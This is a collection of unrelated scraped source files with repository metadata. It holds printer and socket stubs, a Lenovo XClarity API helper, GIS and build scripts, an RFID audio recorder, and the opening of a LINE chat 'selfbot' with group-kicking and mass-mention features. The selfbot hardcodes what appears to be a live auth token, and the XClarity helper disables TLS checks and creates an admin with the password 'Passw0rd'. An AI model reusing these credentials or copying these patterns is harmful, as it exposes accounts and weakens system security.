HPMUD_S_EWS_LEDM_CHANNEL = 'HP-EWS-LEDM'
HPMUD_S_FAX_SEND_CHANNEL = 'HP-FAX-SEND'
HPMUD_S_LEDM_SCAN = 'HP-LEDM-SCAN'
HPMUD_S_MARVELL_EWS_CHANNEL = 'HP-MARVELL-EWS'
HPMUD_S_MARVELL_FAX_CHANNEL = 'HP-MARVELL-FAX'
HPMUD_S_MEMORY_CARD_CHANNEL = 'HP-CARD-ACCESS'
HPMUD_S_PML_CHANNEL = 'HP-MESSAGE'
HPMUD_S_PRINT_CHANNEL = 'PRINT'
HPMUD_S_SCAN_CHANNEL = 'HP-SCAN'
HPMUD_S_SOAP_FAX = 'HP-SOAP-FAX'
HPMUD_S_SOAP_SCAN = 'HP-SOAP-SCAN'
HPMUD_S_WIFI_CHANNEL = 'HP-WIFICONFIG'
HPMUD_UNI_MODE = 0
# functions
def close_channel(*args, **kwargs): # real signature unknown
pass
def close_device(*args, **kwargs): # real signature unknown
pass
def get_device_id(*args, **kwargs): # real signature unknown
pass
def get_pml(*args, **kwargs): # real signature unknown
pass
def get_zc_ip_address(*args, **kwargs): # real signature unknown
pass
def make_net_uri(*args, **kwargs): # real signature unknown
pass
def make_par_uri(*args, **kwargs): # real signature unknown
pass
def make_usb_uri(*args, **kwargs): # real signature unknown
pass
def make_zc_uri(*args, **kwargs): # real signature unknown
pass
def open_channel(*args, **kwargs): # real signature unknown
pass
def open_device(*args, **kwargs): # real signature unknown
pass
def probe_devices(*args, **kwargs): # real signature unknown
pass
def read_channel(*args, **kwargs): # real signature unknown
pass
def set_pml(*args, **kwargs): # real signature unknown
pass
def write_channel(*args, **kwargs): # real signature unknown
pass
# no classes
# variables with complex values
__loader__ = None # (!) real value is ''
__spec__ = None # (!) real value is ''
| [
"jatsundasofia@gmail.com"
] | jatsundasofia@gmail.com |
5651ce9ae2806cf432014fe0af9498228b65bb12 | 2b9c73b27448232644390295c1dc25a6168322ff | /01012020/Client1.py | d5dc206635f19def5a80b664a1abb88e6b7a1bc6 | [] | no_license | Genesisalarcon1998/csp-exercises | 372f1166aa7f9049e30160ed75143600dda588bf | 5ed942036517ddd0ca3d4875bb4c1839bbd80088 | refs/heads/master | 2020-12-19T03:26:39.997294 | 2020-02-10T16:29:46 | 2020-02-10T16:29:46 | 232,543,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((socket.gethostname(), 1025))
complete_info = ''
while True:
msg = s.recv(7)
if len (msg) <= 0:
break
complete_info += msg.decode("utf-8")
print(complete_info) | [
"Genesisalarcon1998@gmail.com"
] | Genesisalarcon1998@gmail.com |
0eb6a89c5f5aa4482f1b13a94ec4c7090b573a4c | 168126e419a9454dd6ecfad699ea0c8602765649 | /xcapy/data/xclarity.py | 037e9719cb480028ee26acdb3dbc900f847543c0 | [] | no_license | andrewCluey/lenovoPy | fffb66bc7b3d380a919d720185fc31ed9fe98837 | cfcea841f12b30542a56f7d1cd315f574093fe49 | refs/heads/master | 2020-06-13T15:43:08.970847 | 2019-07-07T11:57:37 | 2019-07-07T11:57:37 | 194,698,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,945 | py | # Written by Andrew Clure
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# These functions are intended to be re-used and imported into other scripts.
# Each function has a brief description of what it does.
#
import requests
from requests.auth import HTTPBasicAuth
import json
import urllib3
import getpass
import argparse
import atexit
import ssl
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
api_url = 'https://192.168.10.43'
api_user = 'pylxca'
#api_pass = getpass.getpass(prompt='Enter your password: ')
api_pass = ''
#r = requests.get(f'{api_url}/aicc', auth=(api_user,api_pass),verify=False)
#print(r.text)
#print(r.status_code)
#print(r.json())
def xca_discovered(username,password,url):
''' gets a list of devices that have been discovered '''
print(f'authenticating to {url} for user: {username}')
response = requests.get(
f'{url}/discovery', auth=(username,password),verify=False)
if response.status_code != 200:
print(f'ERROR! API responded with: {response.status_code}')
return
return response.json()
def xca_storedcred(username,password,url):
''' Gets a list of all the stored credentials for managing devices '''
response = requests.get(
f'{url}/storedCredentials', auth=(username,password),verify=False)
if response.status_code != 200:
print(f'ERROR! API responded with: {response.status_code}')
return
return response.json()
def xca_discoverdev(username,password,url,devip):
''' discovers devices to be managed '''
payload = {"ipAddresses": "{devip}"}
response = requests.post(
f'{url}/discoverRequest',
auth=(username,password),
verify=False,
data=payload
)
if response.status_code != 200:
print(f'ERROR! API responded with: {response.status_code}')
return
return response.headers
print(payload)
print(response.headers)
def xca_managedev(username,password,url,devip):
''' discovers devices to be managed '''
payload = [{
"ipAddresses": [devip],
"forceManage": True,
"type": "Rack-Tower Server",
"securityDescriptor": {
"managedAuthEnabled": False,
"storedCredentials": {
"id" : "16302"
}
}
}]
response = requests.post(
f'{url}/manageRequest?discovery=false',
auth=(username,password),
data=json.dumps(payload),
verify=False
)
if response.status_code != 200:
print(f'ERROR! API responded with: {response.status_code}. {response.text}')
print(payload)
return
return response.headers
def xca_newuser(username,password,url,newuser,userpw):
''' discovers devices to be managed '''
payload = {
"userPw": "Passw0rd",
"userName": "testUser",
"description": "New User account created by pyLXCA",
"groups": ["LXC-ADMIN"],
"PasswordChangeFirstAccess": True
}
response = requests.post(
f'{url}/userAccounts',
auth=(username,password),
data=json.dumps(payload),
verify=False)
if response.status_code != 201:
print(f'ERROR! API responded with: {response.status_code}. {response.text}')
print(payload)
return response.text
return
return response.json()
#xca_newuser(api_user,api_pass,api_url,'testuser','Passw0rd')
#xca_managedev(api_user,api_pass,api_url,'192.168.10.66')
| [
"aclure@globalprocessing.net"
] | aclure@globalprocessing.net |
9202934aa4dc5ccfd0cc0fc595d2dcecdeae1ff0 | 6bb8cbacd2e79264b7c8276f209977eb3c7d84a8 | /Backup/WSEL_XS_Check.py | 898b9455b6488442eadada08692efdd12e93670d | [] | no_license | bmulcahy/WSEL-Python-Tool | 8042e4eab54829310b356bf3cb6ecd9b1f3a4492 | 5818554dab4b27c0dfc9bac960d666226c23df06 | refs/heads/master | 2016-08-11T20:36:52.704073 | 2015-11-25T21:30:19 | 2015-11-25T21:30:19 | 44,610,691 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,366 | py | from __future__ import print_function
import sys, os, re, arcpy
from arcpy import env
class WSEL_XS_Check:
def __init__(self, config, streams):
self.streams = streams
self.config = config
def __enter__(self):
self.scratchgdb = self.config['scratchgdb']
self.xs_original = self.config['xs_original']
self.xs_dataset = self.config['xs_dataset']
self.streams_original = self.config['streams_original']
self.xs_intersect_dataset = self.config['xs_intersect_dataset']
self.routes_dataset = self.config['routes_dataset']
self.streams_dataset = self.config['streams_dataset']
self.vertices_dataset = self.config['vertices_dataset']
env.workspace = self.scratchgdb
env.overwriteOutput = True
env.MResolution = 0.0001
env.MDomain = "0 10000000"
env.outputMFlag = "Enabled"
env.outputZFlag = "Enabled"
return self
def __exit__(self, type, value, traceback):
return self.warnings
def xs_check(self, xs, name):
warning ={name:[]}
expression = "[WSE]"
arcpy.AddField_management(xs,'Valid',"Double")
arcpy.AddField_management(xs,'WSEL',"DOUBLE")
arcpy.AddField_management(xs,'WSEL_REG',"DOUBLE")
arcpy.CalculateField_management(xs, 'WSEL', expression, "VB")
arcpy.CalculateField_management(xs, "WSEL_REG", expression, "VB")
arcpy.CalculateField_management(xs, 'Valid', "0", "VB")
cursor = arcpy.UpdateCursor(xs, fields='Section; WSE; Valid; WSEL',sort_fields="Section A")
count = arcpy.GetCount_management(xs).getOutput(0)
i=0
error = 0
prevrow =''
for row in cursor:
wsel = row.getValue('WSE')
section =row.getValue('Section')
if section == 0:
row.setValue("Valid",1)
row.setValue("Section",0.001)
cursor.updateRow(row)
if i == 0:
prevrow = wsel
if i != 0:
previous = prevrow
if previous> wsel:
error = error + 1
section = row.getValue('Section')
#print("Section: " + str(section) + " invalid")
row.setValue("Valid",1)
row.setValue("WSEL",previous+0.001)
warning[name].append(section)
cursor.updateRow(row)
wsel = row.getValue('WSE')
prevrow = wsel
i=i+1
del row
del cursor
if error != 0:
return warning
else:
return 'null'
def processStream(self):
self.warnings=[]
for stream in self.streams:
sep = '_'
name = stream.split(sep, 1)[0]
#print("Starting stream "+name)
xs = arcpy.FeatureToLine_management(self.xs_original+"\\"+name+"_xs", self.xs_dataset+"\\"+name+"_xs")
warning = self.xs_check(xs, name)
if warning != 'null':
self.warnings.append(warning)
#print("Finished stream "+name)
return self.warnings
| [
"brian.mulcahy@stantec.com"
] | brian.mulcahy@stantec.com |
5f78e405f573ff85376a83454adda0f77c715adc | a2d3367988bf9285f975b64a83d0e1050c24ab9c | /app/apps.py | 7ecbb87e9a9af02814e0a34e2ce346fc577c9735 | [] | no_license | Lyss74/AboutsGoodsApp | 9cfb75ccc78b51785979cdc09a97803b204b4a70 | 7a5274b7db944adfd41619ffc7cc951e11a33f62 | refs/heads/master | 2022-12-13T09:22:57.573922 | 2019-07-01T07:55:12 | 2019-07-01T07:55:12 | 194,542,619 | 1 | 0 | null | 2022-12-08T05:50:05 | 2019-06-30T17:24:18 | Python | UTF-8 | Python | false | false | 82 | py |
from django.apps import AppConfig
class AppConfig(AppConfig):
name = 'app'
| [
"LyssProGm@gmail.com"
] | LyssProGm@gmail.com |
cec93e40fbfa31c0efdba8beccb93ed57d76dd43 | 192f639939307313737969763ccbdbaa68352317 | /faasmcli/faasmcli/tasks/dev.py | fdaafa09de4990ee4cd73d18d7d3adb7e0cca69a | [
"Apache-2.0"
] | permissive | mkvoya/faasm | 90f0fee34377266ce162f1583b7ddd21a43f30f6 | 6d85a5507a2ce10fcd0c486251e1d26c0e013e28 | refs/heads/master | 2022-12-28T23:22:28.128943 | 2020-10-21T18:53:24 | 2020-10-21T18:53:24 | 306,117,491 | 0 | 0 | Apache-2.0 | 2020-10-21T18:45:48 | 2020-10-21T18:45:46 | null | UTF-8 | Python | false | false | 1,087 | py | from os import makedirs
from os.path import join, exists
from shutil import rmtree
from subprocess import run
from invoke import task
from faasmcli.util.env import PROJ_ROOT
_BUILD_DIR = join(PROJ_ROOT, "build", "cmake")
_BIN_DIR = join(_BUILD_DIR, "bin")
@task
def cmake(ctx, clean=False):
if clean and exists(_BUILD_DIR):
rmtree(_BUILD_DIR)
if not exists(_BUILD_DIR):
makedirs(_BUILD_DIR)
cmd = [
"cmake",
"-GNinja",
"-DCMAKE_BUILD_TYPE=Debug",
"-DCMAKE_CXX_COMPILER=/usr/bin/clang++-10",
"-DCMAKE_C_COMPILER=/usr/bin/clang-10",
"../..",
]
run(" ".join(cmd), shell=True, cwd=_BUILD_DIR)
@task
def cc(ctx, target, clean=False):
if clean:
if exists(_BUILD_DIR):
rmtree(_BUILD_DIR)
cmake(ctx, clean=True)
if target == "all":
target = ""
run(
"ninja {}".format(target),
cwd=_BUILD_DIR,
shell=True,
)
@task
def r(ctx, target):
run(
"./{}".format(target),
cwd=_BIN_DIR,
shell=True,
)
| [
"noreply@github.com"
] | noreply@github.com |
234cc309b974c4a2bb21e97ad291e8d31267e23e | 41539db14285975508d689e1fa1153b338bf6f50 | /Chapter2/les3_2_example.py | f4c308426aa4717ff25926b6dd90c7f4bc3dbfb2 | [] | no_license | dushkinalexandr/stepik_automation_test_selenium | 4254bb2fac76ebc14fa40c64ab6dffe35a9e6ba5 | 82fa2a2cbcc88957e4f31c326524006ef9ccfcc6 | refs/heads/main | 2023-03-29T23:25:17.448944 | 2021-04-06T10:12:09 | 2021-04-06T10:12:09 | 318,863,701 | 0 | 0 | null | 2021-04-06T10:12:09 | 2020-12-05T18:45:07 | Python | UTF-8 | Python | false | false | 386 | py | from selenium import webdriver
import time
browser = webdriver.Firefox()
try:
link = 'http://ya.ru'
browser.get(link)
time.sleep(2)
browser.execute_script("prompt('Hello!');")
prompt = browser.switch_to.alert
time.sleep(2)
prompt.send_keys("OKI DOKI lolololadasdasdasd")
time.sleep(2)
prompt.accept()
finally:
time.sleep(2)
browser.quit()
| [
"ku.wurm@google.com"
] | ku.wurm@google.com |
2c0c9016bb987cc12c64f4dbc7a964a54b1ab1b3 | ebf072232818145211ba444bdf6f5567b87a7086 | /Workingproject.py | a5dbd40a8d99e54ea350ec54b880b1fd6bb0f60d | [] | no_license | lucywebster/thesisproject | c5a0954d946b5c1c0364de3423d289fc9d13944e | e6651d8373e64c9d65e50cde24d09573110e0f4a | refs/heads/master | 2021-06-02T12:07:05.905768 | 2018-11-02T03:56:56 | 2018-11-02T03:56:56 | 135,812,905 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,996 | py | #!/usr/bin/env python
#
# The following program has been written by Lucy Webster, 09154752, for the purpose of
# BEB801 Project, Intergenerational Language Transmission at QUT
#
# The file will allow read and write on to RFID cards
import RPi.GPIO as GPIO
import MFRC522
import signal
import simpleaudio as sa
import pyaudio
import wave
import SimpleMFRC522
from time import sleep
p = pyaudio.PyAudio()
reader = SimpleMFRC522.SimpleMFRC522()
CHUNK = 2048
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
RECORD_SECONDS = 5
continue_reading = True
card_empty = False
def check(fileid):
datafile = open("Audio/record.txt","r")
for line in datafile:
if "{0}".format(str(fileid)) in line:
datafile.close()
return True
datafile.close()
return False
try:
while continue_reading:
print("Scan Tag!")
wavScan = sa.WaveObject.from_wave_file("beeps/scan.wav")
player = wavScan.play()
player.wait_done()
playbackfile = open("Audio/record.txt","r")
id,text = reader.read()
search = "Audio/{0}.wav".format(str(id))
if check(id) == False:
print("not there")
playbackfile.close()
recordfile = open("Audio/record.txt","a+")
WAVE_OUTPUT_FILENAME ="Audio/"+str(id)+".wav"
sleep(1)
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
print("Recording!")
wavRec = sa.WaveObject.from_wave_file("beeps/recording.wav")
player = wavRec.play()
player.wait_done()
sleep(1)
frames = []
for ii in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
print("Done!")
stream.stop_stream()
stream.close()
# p.terminate()
wf = wave.open(WAVE_OUTPUT_FILENAME , 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
recordfile.write("AudioFile: "+str(id)+".wav"+"\n \n")
recordfile.close()
else:
print ("true")
print("Playing "+search)
wavObj = sa.WaveObject.from_wave_file(search)
player = wavObj.play()
player.wait_done()
playbackfile.close()
sleep(1)
card_empty = False
except KeyboardInterrupt:
print("Finish!")
GPIO.cleanup()
| [
"lucyapril96@gmail.com"
] | lucyapril96@gmail.com |
5ec906a7f13bfe9363c263fa69b23f71a96dfda7 | 5aa74b5186866495f9c43a7ada539e155d239d15 | /aud.py | 3de6a8b7501971ca53b0b3facecbea05c8c795e5 | [] | no_license | iWebster28/wavechord | 3dcc15eee6181a1d22009ae31f7f94b9072943c6 | 1b511d82482c5bc747082bebd07b1f6fc025a224 | refs/heads/master | 2023-03-08T21:30:51.517589 | 2021-02-21T18:45:36 | 2021-02-21T18:45:36 | 340,582,568 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 55 | py | import pyaudiotest as pa
root = 49
pa.play_note(root) | [
"IanWebster2828@gmail.com"
] | IanWebster2828@gmail.com |
4ec56b65a6d1c32f1b71a88f3d3e179a2047d363 | c6962356ba66835e7173f4386ae6fb47cf55e38b | /batch_normalize_volume/get_max_volume.py | 52a5558aeb636b09698dba264662979cf583d487 | [] | no_license | ethanweed/Speech-scripts | d90e59dc09a5749feb6ea5a4279601d6fb9b6648 | 6435d2b5eb4af4a8ec0b1283f67119a181bba208 | refs/heads/master | 2022-03-22T02:28:30.320594 | 2022-03-04T09:04:08 | 2022-03-04T09:04:08 | 172,110,760 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 648 | py | #read file into python
# Ethan Weed
# Spring 2019
# get maximum volume from file "read_volume.txt"
# find gain needed to add to bring dB to zero
# save output as "gain_adjust.txt"
import os
pathin = 'path/to/read_volume/file'
file = 'read_volume.txt'
os.chdir(pathin)
with open(file,'r') as f:
text = f.read()
text = text.split('\n')
maxvol = text[27]
maxvol = ''.join(maxvol)
maxvol = maxvol.split()
maxvol = maxvol[4]
maxvol = float(maxvol)
# reduce 0 to e.g. -5 or less if the output files are getting clipped
gain_adjust = str(0-maxvol)
with open('gain_adjust.txt', 'a+') as newfile:
newfile.write(gain_adjust)
newfile.close()
| [
"weed.ethan@gmail.com"
] | weed.ethan@gmail.com |
3d707d21c6ac16799a945bce65e9006254cfa68b | 4c8c9e3648371091fa523d5487542e6a6f200fbd | /TestPython1/src/com/caibo/api/Log.py | d10d432251f4543906b8c358b3803f71c9229e9b | [] | no_license | zhonglekeji/AutoTest | f32bd00802096999f7057ec244ca29a83072fee9 | 73169d47e169cab0a1e854d2b3b0fda43fea6dd5 | refs/heads/master | 2020-04-16T01:29:21.446021 | 2019-01-23T06:38:14 | 2019-01-23T06:38:14 | 165,175,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 888 | py | # -*- coding: utf-8 -*-
class Log:
def print_case_info_Login(self,mobile,pwd,mes):
print('执行登录相关测试用例:\n'+mes+'\n参数:\n'+'mobile:'+mobile+'\n'+'pwd:'+pwd)
pass
def print_case_info_My(self,mes):
print("执行测试用例:\n"+mes)
pass
def print_case_info_identity(self,rel_name,rel_card,mes):
print('执行实名认证相关测试用例:\n'+mes+'\n参数:\n'+'name:'+rel_name+'\n'+'card:'+rel_card)
pass
def print_case_info_get_code(self,mobile,case_name):
print('执行根据手机号获取验证码相关测试用例:\n'+case_name+'\n参数:\n'+'mobile:'+mobile)
pass
def print_case_info_recharge(self,amount,case_name):
print('执行充值相关测试用例:\n'+case_name+'\n参数:\n'+'金额:'+amount)
pass | [
"zhixiegoulbcnj@gmail.com"
] | zhixiegoulbcnj@gmail.com |
a65372cb81c7b03b6c39d5f50a614eb3fe350d61 | ebfcae1c5ba2997b2ac4471d5bedc3f5daffcb31 | /repos/flaskTs-master/app/email.py | 9203880e1598384e4a0187a41bb57893fba8264d | [] | no_license | babiato/flaskapp1 | 84de2d0b26a54f5820d3bbe97926782ad41e005c | 530beb9e3b8516e0e93960b99521c23a523ef546 | refs/heads/master | 2023-02-26T16:36:49.760632 | 2021-02-04T09:08:40 | 2021-02-04T09:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 351 | py | from flask_mail import Message
from app import mail
from flask import render_template
def send_email(to,subject,template,**kwargs):
msg=Message("[TecnologyDreamer]"+subject,sender='879651072@qq.com',recipients=[to])
msg.body=render_template(template+'.txt',**kwargs)
msg.html=render_template(template+'.html',**kwargs)
mail.send(msg)
| [
"jinxufang@tencent.com"
] | jinxufang@tencent.com |
0e13b665b65fffad36965d6b06a4b06237bab28b | 77a5b14525d495edac238d2da5ee3a3658b25373 | /1.py | 163e42d8f8d0181cc7fd5418691a330eef027ff4 | [] | no_license | lee25122529/Arlee.-py3 | 5a8fb1c0c600e0c0bfb68c576b505ee249c3e7fe | 1b60eda2e4665ca34a65acd0ba8306a51f4580eb | refs/heads/master | 2020-03-21T03:14:16.758466 | 2018-07-02T23:33:17 | 2018-07-02T23:33:17 | 138,043,261 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 210,780 | py | # -*- coding: utf-8 -*-
from linepy import *
from akad.ttypes import *
from multiprocessing import Pool, Process
from datetime import datetime
from time import sleep
from bs4 import BeautifulSoup
from humanfriendly import format_timespan, format_size, format_number, format_length
import time, random, sys, json, codecs, threading, glob, re, string, os, requests, subprocess, six, ast, pytz, urllib.request, urllib.parse, urllib.error, urllib.parse
from gtts import gTTS
import html5lib,shutil
import wikipedia,goslate
import youtube_dl, pafy, asyncio
from multiprocessing import Pool, Process
from googletrans import Translator
#==============================================================================#
botStart = time.time()
#==============================================================================#
line = LINE("EtMApw8sq4koJ74nlYN3.IgHHjqwO8kcNaIKBDwPf8W.yZQKQtE/zzl2u0+JaCF8+mwFpvDh6natCKmD2nQvnTc=")
line.log("Auth Token : " + str(line.authToken))
line.log("Timeline Token : " + str(line.tl.channelAccessToken))
# ki = LINE()
# ki.log("Auth Token : " + str(ki.authToken))
# ki.log("Timeline Token : " + str(ki.tl.channelAccessToken))
# kk = LINE()
# kk.log("Auth Token : " + str(kk.authToken))
# kk.log("Timeline Token : " + str(kk.tl.channelAccessToken))
# kc = LINE()
# kc.log("Auth Token : " + str(kc.authToken))
# kc.log("Timeline Token : " + str(kc.tl.channelAccessToken))
# ke = LINE()
# ke.log("Auth Token : " + str(ke.authToken))
# ke.log("Timeline Token : " + str(ke.tl.channelAccessToken))
print ("Login Succes")
lineMID = line.profile.mid
lineProfile = line.getProfile()
lineSettings = line.getSettings()
# kiMID = ki.profile.mid
# kiProfile = ki.getProfile()
# kiSettings = ki.getSettings()
# kkMID = kk.profile.mid
# kkProfile = kk.getProfile()
# kkSettings = kk.getSettings()
# kcMID = kc.profile.mid
# kcProfile = kc.getProfile()
# kcSettings = kc.getSettings()
# keMID = kc.profile.mid
# keProfile = kc.getProfile()
# keSettings = kc.getSettings()
# oepoll = OEPoll(ke)
# oepoll = OEPoll(kc)
# oepoll = OEPoll(kk)
# oepoll = OEPoll(ki)
oepoll = OEPoll(line)
readOpen = codecs.open("read.json","r","utf-8")
settingsOpen = codecs.open("temp.json","r","utf-8")
read = json.load(readOpen)
settings = json.load(settingsOpen)
Rfu = [line]
lineMID = line.getProfile().mid
# kiMID = ki.getProfile().mid
# kkMID = kk.getProfile().mid
# kcMID = kc.getProfile().mid
# kcMID = ke.getProfile().mid
# bot1 = line.getProfile().mid
RfuBot=[lineMID]
Family=["u8868612505a8f0a0a702291b756a45f3",lineMID]
admin=['u8868612505a8f0a0a702291b756a45f3',lineMID]
RfuFamily = RfuBot + Family
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
#==============================================================================#
settings = {
"autoAdd": True,
"autoJoin": False,
'autoCancel':{"on":True,"members":5},
"autoLeave": False,
"autoRead": False,
"leaveRoom": False,
"detectMention": False,
"checkSticker": False,
"kickMention": False,
"potoMention": True,
"lang":"JP",
"Sd": True,
"Nn": True,
"blacklist":{},
"winvite": False,
"wblacklist": False,
"dblacklist": False,
"commentBlack":{},
"wblack": False,
"dblack": False,
"clock": False,
"cName":"",
"cNames":"",
"welcome":"ตั้งข้อความคนเข้าด้วยนะครับ",
"bye":"ตั้งข้อความคนออกด้วยนะครับ",
"invite": {},
"winvite": False,
"pnharfbot": {},
"pname": {},
"pro_name": {},
"message":"Thanks for add me Selfbot By Sai",
"comment":"Thanks for add me Selfbot By Sai",
"Respontag":"ตั้งข้อความแท็กของคุณ",
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"
],
"mimic": {
"copy": False,
"status": False,
"target": {}
}
}
RfuProtect = {
"protect": False,
"cancelprotect": False,
"inviteprotect": False,
"linkprotect": False,
"Protectguest": False,
"Protectjoin": False,
"autoAdd": False,
}
Setmain = {
"foto": {},
}
read = {
"readPoint": {},
"readMember": {},
"readTime": {},
"ROM": {}
}
myProfile = {
"displayName": "",
"statusMessage": "",
"pictureStatus": ""
}
mimic = {
"copy":True,
"copy2":True,
"status":False,
"target":{}
}
RfuCctv={
"cyduk":{},
"point":{},
"sidermem":{}
}
rfuSet = {
'setTime':{},
'ricoinvite':{},
}
setTime = {}
setTime = rfuSet['setTime']
contact = line.getProfile()
backup = line.getProfile()
backup.dispalyName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
mulai = time.time()
myProfile["displayName"] = lineProfile.displayName
myProfile["statusMessage"] = lineProfile.statusMessage
myProfile["pictureStatus"] = lineProfile.pictureStatus
#==============================================================================#
def restartBot():
print ("[ INFO ] BOT RESETTED")
time.sleep(3)
python = sys.executable
os.execl(python, python, *sys.argv)
def logError(text):
line.log("[ ERROR ] " + str(text))
time_ = datetime.now()
with open("errorLog.txt","a") as error:
error.write("\n[%s] %s" % (str(time), text))
def sendMention(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
line.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
logError(error)
line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMessageWithMention(to, mid):
try:
aa = '{"S":"0","E":"3","M":'+json.dumps(mid)+'}'
text_ = '@x '
line.sendMessage(to, text_, contentMetadata={'MENTION':'{"MENTIONEES":['+aa+']}'}, contentType=0)
except Exception as error:
logError(error)
def mentionMembers(to, mid):
try:
arrData = ""
textx = "╔══[จำนวนคนที่แท็ก {} คน]\n╠ ".format(str(len(mid)))
arr = []
no = 1
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "╠ "
else:
try:
textx += "╚══[ชื่อกลุ่ม {} ]".format(str(line.getGroup(to).name))
except:
pass
line.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
logError(error)
line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def backupData():
try:
backup = settings
f = codecs.open('temp.json','w','utf-8')
json.dump(backup, f, sort_keys=True, indent=4, ensure_ascii=False)
backup = read
f = codecs.open('read.json','w','utf-8')
json.dump(backup, f, sort_keys=True, indent=4, ensure_ascii=False)
return True
except Exception as error:
logError(error)
return False
#==============================================================================#
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print ("TAG ALL")
try:
line.sendMessage(msg)
except Exception as error:
print(error)
def restartBot():
print ("RESTART SERVER")
time.sleep(3)
python = sys.executable
os.execl(python, python, *sys.argv)
def logError(text):
line.log(" Sai " + str(text))
time_ = datetime.now()
with open("errorLog.txt","a") as error:
error.write("\n[%s] %s" % (str(time), text))
def sendMessage(to, text, contentMetadata=None, contentType=0):
    """Build a Message addressed to *to* and bump the per-chat counter
    in ``messageReq``.

    NOTE(review): the constructed Message is never actually transmitted
    (no client call is made here) -- confirm whether a send call is
    missing or only the messageReq bookkeeping is intended.
    """
    # Use a None sentinel instead of the original mutable default ({}):
    # a shared dict default is a classic Python pitfall.
    if contentMetadata is None:
        contentMetadata = {}
    mes = Message()
    mes.to, mes.from_ = to, profile.mid
    mes.text = text
    mes.contentType, mes.contentMetadata = contentType, contentMetadata
    if to not in messageReq:
